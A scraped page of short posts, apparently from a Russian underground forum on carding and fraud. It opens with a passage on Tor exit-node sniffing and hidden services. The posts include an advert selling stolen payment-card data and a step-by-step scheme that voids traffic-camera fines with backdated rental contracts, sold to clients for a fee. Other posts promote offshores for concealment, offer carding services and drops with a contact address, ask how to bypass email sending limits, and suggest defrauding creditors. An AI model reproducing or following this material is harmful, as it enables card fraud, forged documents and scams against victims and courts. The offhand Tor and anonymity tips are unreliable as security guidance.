проверяла только определенный диапазон или один конкретный сервер и уже их использовать в качестве выходных серверов (Tor’у можно явно указать какой или какие выходные узлы использовать). Жди подвох. Вывод может быть один — используя Tor будь осторожен. Да, система обеспечивает неплохой уровень анонимности, но не может защитить твои данные от перехвата. И пусть ты даже ты убедился, что на последнем узле не запущен sslstrip, все равно никто не даст гарантии, что проходящие пакеты не дампятся снифером. С другой стороны необязательно рассматривать Tor как исключительно инструмент для анонимного серфинга в Сети. Несколько наших примеров — тому в подтверждение. Держать Exit Node — задача для крепких парней. Надо понимать, что работая в качестве Exite Node’ы, человек серьезно подставляет себя. Ведь именно его IP светиться во время взломов и т.д. В процессе написания статьи через мой сервер дважды пытались провести атаку типа SQL-injection. Так что держи ухо востро, за такие вещи можно запросто схлопотать от правоохранительных органов или от провайдера. Вот лишь некоторые примеры: В 2006 г. спецслужбы Германии осуществили захват шести компьютеров,работавших нодами сети Tor на основании того, что они были незаконно использованы для доступа к детской порнографии. В 2007 г. Национальная полиция Швеции арестовала известного эксперта по компьютерной безопасности Дена Эгерстада по обвинению в неправомерном доступе к компьютерной информации. 22-летний сотрудник компании Deranged Security опубликовал на своем рабочем сайте пароли к электронной почте посольств, негосударственных организаций, коммерческих фирм и правительственным агентств разных стран. По его словам, он в качестве эксперимента создал 5 выходных серверов Tor и перехватывал через них незашифрованный трафик. В 2007 г. немецкая полиция арестовала в Дюссельдорфе Александра Янссена, организовавшего у себя на компьютере сервер Tor, через который неизвестный отправил ложное сообщение о теракте. Несмотря на то, что вскоре г-н Янссен был отпущен,он решил отказаться от дальнейшего использования своего компьютера в качестве точки выхода Tor. Скрытые сервисы — уникальная фишка Tor. Есть у Tor еще одна интересная фича — скрытые сервисы. Пользователи Tor могут предоставлять различные сервисы, такие как веб-доступ или сервер системы мгновенного обмена сообщениями, не открывая своё истинное местоположение. Скрытые службы доступны через специальные псевдо-домены верхнего уровня .onion. Сеть Tor понимает эти домены и направляет информацию анонимно к скрытым службам. Скрытая служба затем обрабатывает её посредством стандартного софта, который настраивается на прослушивание только непубличных (закрытых для внешнего доступа) интерфейсов. Данный функционал можно использовать для размещения сайта, не беспокоясь о цензуре. Никто не будет в состоянии определить владельца сайта, и владелец сайта не будет в состоянии узнать, кто использовал сайт. Специализированные ОС Anonym.OS — LiveCD-ОС на базе OpenBSD, в которой весь входящий трафик запрещен, а весь исходящий автоматически и прозрачно для пользователя шифруется и анонимизируется при помощи Tor — http://sourceforge.net/projects/anonym-os/ ELE — Damn Small Linux+Dillo+Tor+Privoxy+Scroogle (LiveCD) — http://northernsecurity.net/download/ele/ Incognito LiveCD — Gentoo+Tor+TrueCrypt+Thunderbird+Enigmail+Firefox+Torbutton+FireGPG+GnuPG+KeePassX — http://anonymityanywhere.com/incognito/ Phantomix — LiveCD-дистрибутив, предназначенный для анонимного пользования Интернетом с помощью Tor и Privoxy- http://phantomix.ytternhagen.de/ Tor-ramdisk — Дистрибутив Linux, разработанный, чтобы обеспечить работу Tor полностью в оперативной памяти, без использования жесткого диска или иных устройств долговременного хранения данных — http://opensource.dyc.edu/tor-ramdisk/ WWW Tor+Vidalia+Proxomitron+Freecap — wsnow.net/my_soft/41-narushaya-zaprety.html OperaTor — Opera+Tor+Polipo — archetwist.com/en/opera/operator Portable Tor — портативный пакет Tor, не требующий инсталляции на компьютер — portabletor.sourceforge.net/ Torbutton — расширение Firefox, добавляющее в него кнопку включения и выключения Tor. Обеспечивает также улучшенную защиту приватности и изоляцию состояния браузера — addons.mozilla.org/ru/firefox/addon/2275 Vuze — клиент файлообменной сети BitTorrent со встроенной поддержкой Tor — azureus.sourceforge.net/ Неплохой мануал по настройке Tor — www.torproject.org/docs/tor-doc-relay.html.ru Полный список поддерживаемых опций — www.torproject.org/tor-manual.html Настройка скрытых сервисов — www.torproject.org/docs/tor-hidden-service.html.ru
-
1 баллВсем привет! Сегодня я расскажу, где я недавно отдыхал! Думаю, вам будет интересно почитать о новом моем путешествии, которое длилось 7 дней. Я не особо хотел проебать много денег на отдых, а так чтобы было нормально. Я отправился на затухший вулкан Эльбрус. Такой курорт, конечно, не так известен, как Швейцарские Альпы, но все же пользуется популярностью у состоятельных туристов. Восхождение на высокую гору – моя давняя мечта. Эльбрус я выбрал потому, что он отличается от других гор в мире. По сути, Эльбрус – это две вершины давно затухшего вулкана. Я собирался подняться вверх по горе на несколько километров. Во-первых, это большой адреналин и испытание для меня, а во-вторых, с вершины открывается волшебный вид на тысячелетние ледники. Не спорю, меня сложно назвать ценителем прекрасного, но, побывав во многих уголках планеты, я достаточно хорошо разбираюсь в том, что действительно красиво, а что не стоит особого внимания. Естественно, я отправился на курорт на самолете из Нальчика. Если не ошибаюсь, провел в воздухе что-то около 2 часов. Все это время я расслаблялся и предвкушал замечательный отдых. Кстати, обслуживание в самолете от авиакомпании «Ютейр» мне понравилось. Я остановился в одной из гостиниц в районе Азау. Номер мне восхитил. Да, заплатил я за него немало, но это того стоило. Что касается еды, то здесь бы я не прожил без ресторанных блюд. Еда действительно вкусная, хотя для кого-то может показаться и несколько дорогой, ну а в целом я доволен. Впрочем, еде я отдавал малое значение. Меня увлекали полеты на дельтаплане, минеральные источники. Можно сказать, я оздоровился, пока в термальном источнике попивал коктейль и наслаждался жизнью! Скажу честно, музеи и достопримечательности как таковые я обошел стороной – мне это неинтересно и скучно. Зато я нашел казино и провел вечернее время неплохо. Мне понравились в Эльбрусе и сауны. Обслуживание здесь отличное, за состоянием помещения следят отменно, напаривают так, что я наверняка похудел на пару килограмм. Самое увлекательное, конечно – это восхождение на вершину горы. Я заказал услуги личного гида, так как мог себе это позволить. Я купил себе снаряжение, прошел консультацию и технику безопасности. Все было бы круто, но одно но, я отравился чем то ахах. Мне стало плохо и мы вернулись обратно. Мы потратили целый день, я устал до изнеможения, меня тошнило, но был счастливым как никогда ранее. На следующий день я пошел снова покататься в горах. Это того стоит.Ниже фотку сделал для вас. Я думаю, что нужно повторить этот опыт. Никогда не думал, что мне понравиться активный отдых. Ну и конечно ребята давайте втягивайтесь в карж, если бы я им не занимался, то я бы не отдыхал там)
-
1 баллПошаговая прикладная инструкция по теории лжи была найдена мной на одном из любопытных сайтов пару дней назад. Ею и хочу с вами поделиться. Надеюсь, она вам поможет в распознавании лжецов. Наблюдайте за лицом и глазами 1.1. Отслеживайте микровыражения. Это эмоции, которые появляются на лице лишь на доли секунды. Они, в отличии от «выражения лица» действительно говорят правду. 1.2. Следите за нижней частью лица и руками. Часто во время лжи человек неосознанно прикасается к носу или рту. Когда человек сообщает ложную информацию, он может прикрывать рот рукой. Сжатые, напряженные губы свидетельствуют о стрессе. 1.3. Следите за движением глаз. Если люди обычно вспоминают, они смотрят влево вверх, если придумывают и собираются солгать – чаще в право. (Прим. для левшей наоборот). Отмечается, что когда люди лгут – они моргают чаще. Обращайте внимание на веки, они обычно чуть дольше закрыты, чем во время обычного моргания, если человек не согласен с тем, что он слышит или видит. 1.4. Обычно, когда человек лжет, он старается не смотреть в глаза. Однако, в некоторых случаях ложь может выдавать и, наоборот, слишком пристальный непрерывный взгляд в глаза собеседнику. 1.5. В стандартном американском алгоритме распознавания лжи этого не было, но добавлю от себя. Часто, когда человек говорит неправду, его брови на мгновение приподнимаются вверх. Это микромимическое выражение часто сопровождает спонтанную ложь. 2. Чтобы распознать ложь, старайтесь читать язык тела 2.1. Смотрите, как человек кивает. Если человек говорит утвердительно, кивок должен быть соответствующий. Если же он, например, говорит, что чего-то не делал – это будет отрицательный поворот головы. Обратите также внимание, что при сообщении правдивой информации, в отличии от лжи, кивок/поворот должен происходить синхронно с высказывание. Запаздывание или же наоборот фальстарт, как правило, свидетельствует о лжи. 2.2. Смотрите на расположение собеседника. Если человек собирается лгать, он, как правило, предпочитает держаться на отдаленном расстоянии от собеседника и может быть повернутым несколько боком, носки его обуви часто смотрят не прямо в сторону собеседника, а повернуты вбок. Когда человеку нечего скрывать, в основном, он сидит прямо. От себя добавлю, что дистанция между собеседниками также говорит о том, насколько они приятны друг другу. Чем ближе их отношения, тем ближе они располагаются друг к другу. 2.3. Наблюдайте за шеей. Когда человек лжет, его шея потеет, появляется ощущение сдавленности, он оттягивает воротничок. Такое часто бывает на собеседованиях. 2.4. Смотрите на дыхание. Во время лжи дыхание становиться более частым и поверхностным. Человек делает несколько коротких мелких вдохов/выдохов. Часто, когда человек лжет, губы пересыхают. 2.5. Принимайте во внимание общую позу. Если руки и ноги скрещены, голова неподвижна, общее количество жестов уменьшилось – скорее всего человек лжет. 2.6. Во время лжи, человек старается избегать таких жестов, как: указывание пальцем, открытые ладони, «пирамидка» из пальцев. Однако, это можно натренировать. 2.7. Демонстративное поведение, такое, как нарочитая скука, зевание – могут являться попытками скрыть обман. 2.8. Смотрите на суставы. Лжецы часто стараются крепко вцепиться в какой-либо предмет, например, ручку стула так, что костяшки на руках побелеют. 2.9. Обратите внимание на потливость. Как правило, люди больше потеют, когда говорят неправду. Только не спешите изобличать лжеца в том, кому просто жарко или душно в помещении, хотя это тоже стоит учитывать. 3. Наблюдайте за вербальными ответами 3.1. Обращайте внимание на голос. Человек может начать говорить быстрее или медленнее, когда он лжет. Обычно во время лжи тон голоса повышается 3.2. Отлавливайте слишком много деталей. Если человек говорил в общем, и вдруг, в какой то момент в его речи появилось слишком много мелочей – он может специально запутывать вас, чтобы заставить поверить в ложь. 3.3. Наблюдайте импульсивные реакции. Если человек отвечает сразу на вопрос, который предполагает раздумья, возможно, он лжет. Так или иначе, но он продумал ответ заранее, зачем ему это, если он не пытается вас обмануть? 3.4. Обращайте особое внимание на ответы человека на ваши вопросы. Ложь обычно заставляет людей сильно нервничать. Защищаясь, человек может стараться расположить какой-то объект между вами, например сумку или папку. Виновный человек обычно отвечает со злобой. Однако, на его лице в момент обвинения, можно уловить эмоцию страха, и лишь потом последует агрессивная реакция. Однако, агрессия также может служить и индикатором обычного защитного поведения человека, которого несправедливо обвинили во лжи. 3.5. Если человек не лжет, а лишь пытается оправдаться, отвечая на вопрос, он будет предоставлять максимальное количество дополнительных фактов и деталей, в то время, как виновный человек не устанет повторять то, что он уже сказал, только более настойчиво и перефразируя. 3.6. Лжец избегает прямых ответов на вопросы, он всегда стремиться выиграть время. Лжец может запутывать вас общими фразами, ссылаться на авторитеты. 3.7. Обращайте внимание на использование слов, это может дать много подсказок. Например, лжец может повторять ваш вопрос, перед тем, как начать на него отвечать. 3.8. Лжец избегает различных сокращений в речи, стараясь максимально четко по буквам проговаривать слова. 3.9. Лжец может намеренно упускать местоимения. Например, вместе «Она сделала это» говорить просто «Сделала это». 3.10. Лжецы обычно используют запутанные предложения и начиная сложный оборот, часто не заканчивают его. 3.11. Лжец часто использует преувеличение, юмор или сарказм, чтобы уйти от прямого ответа. 3.12. Использование таких оборотом, как «честно», «в действительности», «откровенно говоря», «мое воспитание не позволит мне солгать», часто означает обман. 3.13. Если отвечая на сложный вопрос односложно, человек смотрит на вас, а дальше, поясняя, смотрит в сторону – это как правило, правда. Ему просто необходимо время, чтобы сосредоточиться. 3.14. В речи лжеца часто вовсе отсутствуют негативные выражения и эмоции. Обычно, говоря правду люди ссылаются и на положительные и на отрицательные обстоятельства. 3.15. Лжец отвечает слишком быстро, используя негативные ответы в позитивной конструкции. Например, «Вам было неприятно делать это?» «Нет, мне не было неприятно делать это» 3.16. Человек склонен повторять ложь теми же cловами несколько раз, так как, ему кажется, будто это более убедительно. Обычно для лжеца составляет проблему быстро перефразировать одно и то же «убедительное» предложение и он как заведенный твердить одно и то же. 4. Раскрытие лжи через ваши собственные ответы 4.1. Будьте очень осторожны и избегайте ошибок. Помните, что одного и даже двух признаков, часто не достаточно, чтобы обвинить человека во лжи. Не мните себя Доктором Лайтманом из сериала «Теория лжи» Необходим целый ряд факторов и точный, многократный их анализ для того, чтобы сделать вывод, что человек лжет. Многие эмоциональные реакции, такие как стыд, беспокойство, волнение неопытный верификатор может принять за ложь. Кроме того, помните о субъективизме. Иногда нам очень хочется быть обманутыми, настолько, что мы охотно игнорируем очевидные признаки, и, наоборот, часто мы стремимся уличить во лжи человека, который нам не симпатичен или же похож на того, кто когда-то нас обманул. 4.2. Уделите некоторое время тому, чтобы расположить к себе лжеца. Не старайтесь сразу предвзято оценивать или давить на него с позиции силы. Создайте атмосферу доверия и понимания, это поможет вам легче считывать язык тела. 4.3. Определите образец правды для сравнения. Как говорилось ранее, диагностируемый должен быть расслаблен и чувствовать себя непринужденно. Поговорите с ним о вещах, которые ему интересны или о фактах, которые вам точно известны о нем. Спросите, что он думает по тому или иному поводу. Это поможет вам определить естественное поведение для того, чтобы в дальнейшем сравнивать его с теми фрагментами, где вы подозреваете ложь. 4.4. Обращайте внимание на отклонения и уходы от ответов. Например, на вопрос «Вы когда-нибудь били свою жену?» человек может ответить вопросом «Я люблю свою жену, зачем бы я это делал?». В данному случае мы можем заподозрить наличие скрываемой информации и расспрашивать подробнее. 4.5. Задавайте открытые вопросы. Избегайте вопросов, на которые человек может ответить однозначно и коротко, а также не повторяйте то, что он уже сообщил. 4.6. Попросите лжеца рассказать историю в обратном хронологическом порядке, задом наперед. Если человек лжет, это будет очень сложно сделать. 4.7. Смотрите на предполагаемого лжеца с выражением недоверия. Если человек лжет, очень скоро он начнет сильно нервничать. Если же он говорит правду на его лице будет грусть, разочарование, возможно оттенок злости. 4.8. Используйте молчание. Лжец будет чувствовать себя некомфортно, не получая обратной связи. У него возникнет необходимость заполнить пустоту, создаваемую вами. Таким образом он может нервничать и сам себя выдать, стараясь придумывать все новые детали и обстоятельства. 4.9. Идите до конца. Лжец будет стараться привести максимальное количество доводов против того, что бы вы поговорили еще с кем-то, кто был участником рассказанной истории или может знать детали. Он будет статься убедить вас, что этого делать не следует и что это лишь трата вашего времени. Но не верьте, проверяйте все, что можно проверить.
-
1 балл
-
1 баллДа я согласна, зачем мотивация на теневых бордах ? мы и так все мотивированны )
-
1 баллВ первый раз об оффшорах я услышал еще лет в 11. Конкретнее познакомился в 16 лет. В то время друзья , которые старше меня, уже проворачивали дела, выводя деньги в Прибалтийские банки и далее в оффшоры. Теперь я расскажу вам , что это такое и зачем каждому из вас обязательно знать, что это такое. На мой взгляд, каждый человек, который ведет сверхдоходный бизнес, должен знать и желательно даже уметь правильно использовать такое явление , как оффшоры. Что такое оффшор? «Оффшор» — это скорее экономико-географическое понятие, чем юридический термин, — законодательного определения данному явлению до сих пор нет. Это понятие широко применяется в налоговом планировании в отношении компаний, зарегистрированных в странах, полностью освобождающих их от уплаты налогов по месту регистрации. Как правило, эти компании не должны предоставлять в государственные органы бухгалтерскую или налоговую отчетность, а также отличаются простотой администрирования и обеспечивают высокий уровень конфиденциальности — информация о владельцах компаний закрыта. Зачем нужны? Налоги. В среднем , в оффшорах можно сэкономить от 50 процентов, в зависимости от налоговой ставки. Секретность. О да! По закону, если компания зарегистрирована в оффшоре, то ее владельца никто не узнает ( Это и хорошо и плохо) Доступность. Компании покупаются под ключ. При этом, государства в оффшорных зонах даже способствуют этому, и позволяют продавать компании под ключ. Самое плохое - что в России людей запугали, что оффшоры это плохо и нелегально, ведь надо платить налоги в собственной стране. При этом, почти каждый чиновник имеет связи с оффшорами, и каждый читающий это понимает. Так почему же тебе, мой дорогой друг, при первых сверхприбылях и заработках, не подумать о регистрации собственной компании в оффшоре? Я бы посоветовал покупать оффшор под ключ, а не регистрировать самостоятельно, ибо это безумно сложно. Где и как можно задействовать оффшорную компанию? Оффшорные компании характеризуются тем, что: они освобождены от уплаты налогов в стране регистрации; от них не требуется подавать сведения о своём финансовом состоянии в какие-либо государственные органы; обеспечивается высокий уровень конфиденциальности: информация о внутренней структуре компаний (кто директора, акционеры, бенефициарные владельцы?) в государственные органы не представляется; Вот почему такие компании имеет смысл использовать в качестве холдинговой структуры; компании для привлечения и инвестирования средств; компании для накопления ресурсов (в том числе, страховых выплат – кэптивные и иные страховые и перестраховочные компании); собственников авторских прав и иной интеллектуальной собственности. И, конечно же, как самый распространённый вариант – обычная коммерческая деятельность, связанная с экспортно-импортными поставками товаров. На этом все. Я рассказал вам об оффшорах. Считаю это действительно полезной информацией, ведь каждый должен хотя бы знать о таком термине.
-
1 балл
-
1 баллПроходи скорее проверку ! ОООООООООООООЧЕНЬ НУЖДАЮСЬ В ТВОИХ УСЛУГАХ!!!!
-
1 баллЯ выделил несколько правил для вас, хищники, чтобы ваш капитал рос, а не летел в пекло. Умерь свой пыл. Перестань покупать безделушки. Даже по 100 рублей. Ты удивишься, узнав, что за месяц на покупке всяких прикольных плюшек набегает солидная сумма Соблюдай режим. Не ложись спать в 4 утра и не просыпайся в 2 дня. От того, как ты поспал, зависит ясность твоего ума, а следовательно и твоя прибыль. После того, как я это осознал, я начал генерировать много годных идей и самое главное, у меня был энтузиазм их реализовывать Не забывай про отдых. Отдыхая, ты получаешь новые силы для своего дела. Отдыхай каждый день, например после тяжелого дня сядь за ps4 и поиграй часок в гта 5, либо сходи побегать или погулять с собакой. Раз в месяц устраивай себе мегаотдых, потрать крупную для тебя сумму, чтобы была мотивация заработать в следующем месяце в 10 раз больше, чем ты потратил на отдых. Факт в том, что это работает Ставь конкретную цель. И следуй ей, делай всё, чтобы прийти к этой цели. Никаких отклонений влево или вправо, ты должен идти по дороге, которую прокладываешь себе сам. Уверяю тебя, ты сам увидишь, как деньги перестают тратиться на лишнее Никаких бездумных решений. Не вкладывай в пирамиды, хайпы и прочие сомнительные вещи, быстрого профита ты с этого не получишь, а в худшем случае ты останешься с голой жопой И самое главное, помни, пока ты бездействуешь, действуют другие и рубят ТВОИ бабки, которые ты бы мог заработать.
-
1 баллПродавец попросил оставить отзыв на этой площадке Оставляю, ликвидировал мне фирму без проблем, хотя она была очень проблемная, да еще и взял копейки Спасибо.
-
1 балл
-
1 баллПо итогу я купил схему за 10к, отбил за 4 дня, неплохой лишний заработок Спасибо бинго
-
1 баллЕсли вам пришел конверт из центра видеофиксации, вы можете в соответствии с ч.2 ст. 2.6.1 КоАП РФ быть освобождены от ответственности – если в ходе рассмотрения выяснится (будет подтверждено, доказано), что на момент фиксации автомобилем управляли не вы. Поэтому в любом случае надо обжаловать постановление. Обычно подтверждением служит договор аренды, где указано следующее: ответственность за штрафы, полученные в период действия договора, в т. ч. полученные с помощью устройств фото-видео фиксации, ложится на арендатора. Если такая строка есть – то постановление по делу об административном правонарушении должно быть отменено, а производство по нему прекращено (ч.2 ст. 30.7 КоАП РФ). В соответствии со ст. 30.1 КоАП РФ постановление, вынесенное ГИБДД, может быть обжаловано в районном суде по месту нахождения отдела ГИБДД (смотрите адрес на конверте, откуда пришло – и через интернет определяете районный суд). Плюс можно еще жалобу вышестоящему лицу отправить. Важно, чтобы вы были вписаны в страховку или она должна быть неограниченная. А теперь по порядку, срок привлечения к административной ответственности не может превышать 2 месяца. КоАП ст 4.5. Этой статьей мы и будем руководствоваться для не оплаты штрафов. При отмене судом постановления об административном правонарушение привлечь другое лицо не представляется возможным в связи с истечением срока давности ( 2 месяца) административной ответственности. Простым языком, штраф видеофиксации можно отменить при наличии договора аренды, а повторно привлечь к административной ответственности лицо которому передано транспортное средство ГИБДД не успевает в срок 2 месяца, так как в 2-х месячный срок с момента нарушения ПДД выноситься постановление об Административном правонарушение, которое направляется вам по почте и у вас иметься 10 дней на подачу жалобы и тут не стоит забывать, что суд рассматривает вашу жалобу не на следующей день, суды завалены работой. При отмене протокола судом решения вступает в законную силу в течение 10 дней. Получается, что ГИБДД не успевает привлечь к ответственности лицо которому передано данное ТС в аренду, таким образом и первое и второе лицо освобождаются от административной ответственности. Регистрировать фирму или открывать ИП нам не обязательно. Итак, приступаем к работе. На первоначальном этапе нам необходимо определить для себя потенциальный список клиентов, который мы и разберем. В первую очередь основным клиентом для нас как показывает практика будут Транспортные компании, крупные автопарки такси, фирмы грузоперевозки, а так же обычные физические лица, имеющие транспортные средства. Как искать клиентов, все очень просто обзваниваем фирмы такси города, фирмы грузоперевозки и говорим с директорами. Пример Диалога Здравствуйте, меня зовут Андрей. Я бы хотел к вам обратиться с интересным предложением по списанию штрафов ГИБДД. После таких слов всем абсолютно всем директорам становиться интересно. Договариваетесь о встречи, при встречи ведете диалог следующим образом. Говорите что у вас есть штат юристов которые работают по обжалованию штрафов и вы с легкостью их закроете за 25% от стоимости всех штрафов компании. В Договоре аренды прописываете эту же сумму свои 25% от суммы штрафа. Приведу пример средней компании грузоперевозок, за месяц сумма штрафов порядка 70 тыс. Да все зависит так же от города, в крупных городах услуга будет иметь колоссальный спрос. Вы можете выбрать другое направление и работать только с физ лицами. Поездите по автосервисам предложите свои услуги, друзья знакомые это все ваши клиенты. Таксист должен быть ваш постоянный клиент, поговорите с ними предложите за 25% закрывать штрафы. Незабываем про Авито. Сарафанное радио со временем сделает свое дело и вы будете иметь хороший профит. Не забывайте важный момент. Важно, чтобы вы были вписаны в страховку или она должна быть неограниченная. Первыми вашими клиентами станут ваши друзья коллеги знакомые, предложите им списать их штрафы за 25% от суммы штрафа. Поверьте желающих будет масса. Пошаговый порядок ваших действий после получения конверта «счастья». Вам звонит клиент и говорит что пришел штраф нужно его списать. У вас есть 10 дней в которые он должен предоставить этот конверт с постановлением лучше в первые 3 дня что бы конверт был у вас. Далее вы составляете договор аренды ТС (согласно Приложению №1) с собственником на кого пришел штраф видеофиксации. Вы, либо ваша фирма если пожелаете открыть, или любое 3 лицо выступаете арендатором ТС. ВАЖНО что бы договор был составлен датой ранее чем совершенно ПДД, то есть договор делаете задним числом. Далее готовим жалобу в суд заполняем (Приложение №2), затем Ходатайством №3, №4. Напоминаю ходить по судам мы НЕ БУДЕМ. Все отправляется по почте, в ходатайстве № 4 которые мы прилагаем к документам мы просим рассмотреть жалобу без нашего присутствия. Не позднее 10 дней с момента получения конверта вам необходимо направить в районный суд (смотрите адрес на конверте, откуда пришло – и через интернет определяете районный суд) Список документов которые мы отправляем Копия протокола об административном правонарушении Копия конверта с 2-х сторон Копия Договора Аренды ТС Жалобу в 3-х экземплярах Ходатайство о восстановление срока на обжалование Ходатайство о рассмотрение жалобы без участия истца Это все что от вас необходимо, ждем решения суда. В 99,9 случаях все постановления будут отменены. Важно, чтобы вы были вписаны в страховку или она должна быть неограниченная Документы для работы: https://yadi.sk/d/lif-KFiY3LXAMd
-
1 баллДобрый день. Продажа CC,вся база наша с фейков В данный момент имеются CC: USA | DE | FR | CA | UK | ASIA А так же небольшой микс мира ! Так же в небольшом кол-ве имеется материал +VBB. Выборку по бинам мы предоставляем бесплатно. Наши правила очень просты: - Замена в течении 2 часов (можно договорится) - Деньги возврату не подлежат (только замена на аналогичный товар) - Приятные бонусы и скидки, тем кто покупает у нас вервые - Для старичков отдельные цены - Принимаем QIWI | Bitcoin
-
1 балл
-
1 балл
-
1 балл[media=hide; name=User1, User2]текст сообщения или ссылка[/media] ....... хайд для конкретного ника или ников если они перечисляются через запятую [media=hide; grp=1, 2, 3]текст сообщения или ссылка[/media] ............хайд для выбранных групп [media=hide; post=XXX]текст сообщения или ссылка[/media] ............. хайд на кол-во постов [media=hide; like=XXX]текст сообщения или ссылка[/media] .............. хайд на кол-во лайков [media=hide; post=XXX; like=XXX]текст сообщения или ссылка[/media] .............хайд на комбинации пост\лайки [media=hide; like=XXX; post=XXX]текст сообщения или ссылка[/media] ............ хайд на комбинации лайки\пост Как это применять? Копируете нужный Вам вариант и вставляете его вручную в сообщение, заменив ХХХ на нужный вам вариант кол-во постов или лайков. Все ссылки на скачивание файлов обязательно необходимо ставить Hide минимум 10 сообщений.
-
1 балл
-
1 балл
-
1 балл
-
1 баллНовейший сервис и очень полезный,на вашем броде только видел такой.Обязательно воспользуюсь если найду куда бенз сплавить :wink:
-
1 балл
-
1 баллСтолкнулся с такой проблемой mail.com не дает отправить больше 10 писем потом наступает блок на 1 час. Как можно обойти это кто знает?
-
1 баллВсем привет!) Я конечно не профи, только начинаю заниматся работай в интернете, прочитал данную тему,и задался вопросом, а зачем кредиторам отдавать деньги? Почему нельзя их просто взять и кинуть? Все равно ведь кошелек левый с аттестатом будет? Или это я думаю что все так просто?
-
1 балл
-
1 баллУ нас дипломы по другому сделаны, слишком толстая обложка, в рамку сложно запихнуть А на счет того, что это не всем интересно, согласен. Однако сейчас это востребовано, т.к. сувенирный рынок уже давно не обновлялся. А это достаточно оригинальный и индивидуальный подарок.
-
1 баллКстати, с расписками сейчас проще. Собственного говоря, и писать ничего не нужно. Снимаешь момент передачи денег хоть камерой, хоть на мобильный телефон. Естественно, на видео, должно быть устное заявление с обеих сторон.
-
1 баллВсегда найдется желающий для "кидка". Это ведь так заманчиво - подсунуть под видом раритета расхожую подделку. Вариант - подменить экземпляр в экспозиции ( а еще лучше из запасников) музея на поддельный. Сколько об этом писалось и в газетах и журналах, фильмов снято, книг написано.
-
1 баллВ квартире прописаны и реально живут мой муж,ребенок,мать мужа. Квартира не приватизирована. Помимо этого там прописаны сестра мужа и двое несовершеннолетних детей.В реальности они живут уже 17 лет в квартире мужа жены,которая в данный момент на него оформлена.Не так давно мать моего мужа умерла. Она была главным квартиросъемщиком.Вопрос. Кто будет главнм квартиросъемщиком,если желание имеют оба?И что это дает? Может ли сестра приватизировать свою часть жилплощади и в последствии продать? Чем вообще опасна такая ситуация,при том,что мира между семьями нет и чего ожидать неизвестно.
-
1 балл
-
1 балл
-
1 баллЕсли руки прямые и доход от биза несколько лимонов в месяц, то можно создать такую систему, что тебя даже господь бог не найдет
-
1 балл
-
1 баллDevarion, пополнял игры, пиратию, танки, ганджаварс итд смысл там оплата через гейт2...
-
1 баллну а какие ОС ты посаветуешь кроме Линукс? есть таковые? у нас в Игровых автоматах линукс стоит, все на компах теперь сделано. дак просто посидел в ней покавырялся, что то мне не понравилась ОС эта.. в плане безопасности не знаю. но если она действительна лучше Винды, перейду на нее.
-
1 баллА как же 3г модем на дропа (да хоть на кого) + ноут и такси по городу. Катаешься и делаешь свои дела ) Дальше все сжигаешь...
-
1 баллВнимание! Административная группа не производит рассылки в личные сообщения от имени обычных пользователей! И тем более не предлагает услуги по цене в два раза дешевле
-
1 баллкакая юар? там люди голодают, а ты предлагаешь на бабло разводить)
-
1 баллСмоделированная ситуация: 5 утра, звонок в дверь, менты, ордер на обыск, понятые. Я хочу чтобы обыск проводился в присутствии адвоката. Звоню адвокату, он говорит, что сможет подъехать, например в 17.00, по закону должны ли ждать менты адвоката? Есть ли какие то сроки в которые должен приехать адвокат? Спасибо.
-
1 балл
-
1 балл
-
1 балл
-
1 баллВозьмусь за вашу работу. Все предложения в лс. Опыт кардинга. так же В скором времени должны появится дропы. Жду предложений в ЛС либо на мыло qwefgfeee@mail.ru Территориально г.самара
-
1 баллНа юге российской столицы накануне вечером произошло дерзкое преступление. Со склада одной из коммерческих компаний были похищены норковые и мутоновые шубы на сумму около пяти миллионов рублей. Как рассказал представитель правоохранительных органов, в 18:30 злоумышленники проникли на территорию склада коммерческой компании, расположенной на Ореховом бульваре, взломали входную дверь торгового павильона и похитили более 100 шуб. "Неизвестные взломали входную дверь торгового павильона, принадлежащего индивидуальному предпринимателю, откуда похитили 102 шубы из меха норки и мутона. Ущерб составил 4,7 миллиона рублей", - сказал собеседник РИА Новости. По факту преступления возбуждено уголовное дело, ведется розыск преступников. Выясняются все обстоятельства произошедшего, сообщает "Интерфакс". Между тем некоторое время назад в Москве перекрыли канал транспортировки в крупных партиях контрабанды меховых изделий. Это стало возможным благодаря слаженным действиям сотрудников УБЭП Управления на транспорте МВД России, оперативников погрануправления ФСБ и администрация аэропорта "Домодедово". Правоохранители изъяли в московском аэропорту более трех тысяч меховых шуб стоимостью более 1,5 миллиона долларов, которые были контрабандно ввезены из Китая. В ходе совместных мероприятий при выезде с грузового терминала аэропорта "Домодедово" был остановлен грузовой автомобиль MAN, в котором находились тюки общим весом пять тонн. У находившихся в грузовике водителя и экспедитора отсутствовали документы, подтверждающие "законность происхождения данной продукции". При осмотре в тюках были обнаружены контрабандные полушубки и шубы.
-
1 баллК наркотикам отношусь нейтрально, каждый снимает стресс по своему. Еще когда в речке учился бывало анашу курил по выходным) Но детство кончилось, повзрослел, поумнел.
